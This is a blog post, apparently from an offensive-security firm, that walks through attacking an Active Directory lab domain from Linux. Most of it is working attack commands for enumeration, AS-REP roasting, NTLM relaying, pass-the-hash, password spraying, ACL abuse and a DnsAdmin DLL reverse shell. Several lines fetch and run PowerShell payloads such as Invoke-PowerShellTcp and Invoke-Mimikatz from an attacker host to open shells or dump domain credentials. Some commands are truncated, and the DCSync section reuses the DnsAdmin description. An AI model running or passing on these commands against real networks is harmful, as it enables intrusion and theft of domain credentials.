Attacking active directory with linux
Hi, readers!
In this new post we will learn how to run Powershell modules and files, for example Powerview. This is a great advantage if we are connected to an internal network, because we will save on evading signatures and AV/EDR behaviour as long as we are in the active directory of the correct segment.
Enumerate Active Directory
Install Powershell in linux
sudo apt update && sudo apt install -y curl gnupg apt-transport-https
curl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add -
sudo sh -c 'echo "deb [arch=amd64] https://packages.microsoft.com/repos/microsoft-debian- bullseye-prod bullseye main" > /etc/apt/sources.list.d/microsoft.list'
sudo apt update && sudo apt install -y powershell pwsh
Enumerate AD with Bloodhound-python
Example:
bloodhound-python -u kai.bel -p password1 -ns 192.168.200.129 -d cs.org -c All
Resources:
https://github.com/fox-it/BloodHound.py
https://github.com/BloodHoundAD/BloodHound
Search Users DCSync Rights in BloodHound
Search Users AS-REP Roastable Users (DontReqPreAuth) in BloodHound
Search Unconstrained Delegation in BloodHound
Search Shortest Paths to Domain Admins in BloodHound
Identificate actives with crackmapexec
Example:
crackmapexec smb 192.168.200.0/24 -d cs.org
Identificate actives with nmap
Example:
nmap -sV -p445,139 192.168.200.0/24 -vvv
In this scenario we find 3 devices 1 DC and 2 workstations. we have blocked access to shared folders.
nmap --script smb-enum-shares -p 139,445 192.168.100.0/24
nmap --script=smb-enum* --script-args=unsafe=1 -T5 192.168.100.7
Identificate actives with nbtscan
Example:
nbtscan -r 192.168.200.0/24
AS-REP Roasting
ASREPRoast attack looks for users with don't require Kerberos pre-authentication attribute (DONT_REQ_PREAUTH).
Impacket GetNPUsers
ASREPRoast attack looks for users with don't require Kerberos pre-authentication attribute (DONT_REQ_PREAUTH).
Example:
/usr/bin/GetNPUsers.py cs.org/kai.bel:password1 -dc-ip 192.168.200.129 -request -format john - outputfile outputfile.txt
View hashes dump.
Password cracking with john
Example:
john --format:krb5asrep outputfile.txt --wordlist=/usr/share/seclists/Passwords/xato-net-10-million- passwords-100000.txt
Resources:
https://github.com/openwall/john https://github.com/SecureAuthCorp/impacket/
SMB Signing Disabled / ntlmrelayx
This kind of attack is very dangerous because anybody with access to the network can capture traffic, relay it, and get unauthorized access to the servers.
Lateral Movement via SMB Relaying.
Responder and ntlmrelayx.py (Local Admin Dumping local SAM hashes)
Example:
sudo nano /usr/share/responder/Responder.conf (edit smb for off and https off)
sudo python3 /usr/share/responder/Responder.py -I eth0 -dw
sudo ln -s /usr/share/doc/python3-impacket/examples/* /usr/bi
sudo ntlmrelayx.py -tf target.txt -smb2support
Victim: You will manually enter a shared path.
Attacker: will have dumped the hashes stored on the PC’s 192.168.200.129 and 192.168.200.130
Reverse TCP Responder and ntlmrelayx.py
sudo python3 /usr/share/responder/Responder.py -I eth0 -dw python3 -m http.server 8080
ntlmrelayx.py -tf /home/hernan/target.txt -smb2support -c "powershell IEX(New-Object Net.WebClient).downloadString('http://192.168.1.6:8080/Invoke-PowerShellTcp.ps1')"
nc -lvp 443
Mitm6 and ntlmrelayx.py
Example:
pip install mitm6
ntlmrelayx.py -6 -wh 192.168.1.6 -tf /home/hernan/target.txt -socks -debug -smb2support
ntlmrelayx.py -6 -wh 192.168.1.6 -tf /home/hernan/target.txt -socks -debug -smb2support
Victim:
ntlmrelayx> socks
Pass The Hash
It is a technique that allows an attacker to authenticate to a remote server or service using the underlying NTLM or LanMan hash of a user's password, rather than requesting the associated plain text password, as is often the case.
crackmapexec
Example:
crackmapexec smb -u 'Administrador' -H '2b73e1a325df8ca7bd82063457391964' --exec-method smbexec -x whoami 192.168.200.0/24 -d cs.org
Evil-Winrm
Example:
evil-winrm -u Administrador -H '2b73e1a325df8ca7bd82063457391964' -i 192.168.200.129
Pth-Winexe
Example:
pth-winexe -U cs.org/Administrador
%aad3b435b51404eeaad3b435b51404ee:2b73e1a325df8ca7bd82063457391964 //192.168.200.129 cmd.exe
Impacket
Example:
smbclient.py -hashes aad3b435b51404eeaad3b435b51404ee:2b73e1a325df8ca7bd82063457391964
Example:
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:2b73e1a325df8ca7bd82063457391964
Example:
wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:2b73e1a325df8ca7bd82063457391964
Password Spraying
Password spraying is a technique used by an attacker to obtain valid access credentials that consists of trying the same password on multiple users.
crackmapexec
Password spraying SMB
Example:
crackmapexec smb 192.168.200.128 -d cs.org -u users.txt -p 'Changeme123!'
Connect remote SMB
Example:
/usr/bin/smbexec.py 'cs.org/administrador:cs2022!@192.168.200.128'
Example:
crackmapexec smb 192.168.200.128 -u 'administrador' -p 'cs2022!' -X 'ipconfig' -d cs.org
Password spraying winrm
Example:
crackmapexec winrm 192.168.200.129 -d cs.org -u /home/hernan/users.txt -p 'Changeme123!'
Connect remote winrm
Example:
evil-winrm -i 192.168.200.129 -u lancelot.carla -p Changeme123!
Resources:
https://github.com/Porchetta-Industries/CrackMapExec https://github.com/SecureAuthCorp/impacket/ https://github.com/Hackplayers/evil-winrm
Abusing ACLs/ACEs
Any misconfiguration in the registry's ACL permissions can allow a standard user (with low privileges) to make settings in GPOs, add users to a specific group, change passwords, etc.
In this scenario we can see that the users of the "Marketing" group have permissions to add users to the "Project Management" group, change passwords, etc.
Changing passwords:
$Pass = ConvertTo-SecureString 'P@ssw0d!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('cs.org\merry.inger', $Pass)
Adding a group
Add-DomainObjectAcl -Credential $Creds -TargetIdentity "Domain Admins" -Rights WriteMembers
posdata: This proof of concept can be done with PowerView. (I will omit to add an image)
DnsAdmin
For the attack to work, you must have compromised an account that is a member of the DNS administrators group or that has write privileges on a DNS server object.
The attack vector consists of injecting a malicious DLL into the DNS process that runs as a system to scale when the service is restarted.
Example:
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.1.6 LPORT=80 -f dll > dns.dll
dnscmd.exe DC-01 /config /serverlevelplugindll C:\Users\kai.bel\Documents\dns.dll sc.exe stop dns
sc.exe start dns
posdata: you must have local administrator privileges or service management permissions for exploitation.
DCSync
Abuse in AD where a user who is member of the DNSAdmins group or have write privileges to a DNS server object can load an arbitrary DLL with SYSTEM privileges on the DNS server
Mimikatz
Example:
IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.6/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -Command '"lsadump::dcsync /domain:cs.org /user:Administrador"'
Impacket
Example:
secretsdump.py cs.org/elle.maggee:
secretsdump.py cs.org/elle.maggee:
And that would be all! We hope you liked it and that it helped you to add to the knowledge you already had.
See you in next posts!
Author
Omar Hernan Rodríguez Mendoza
Seguridad Ofensiva - Entelgy Perú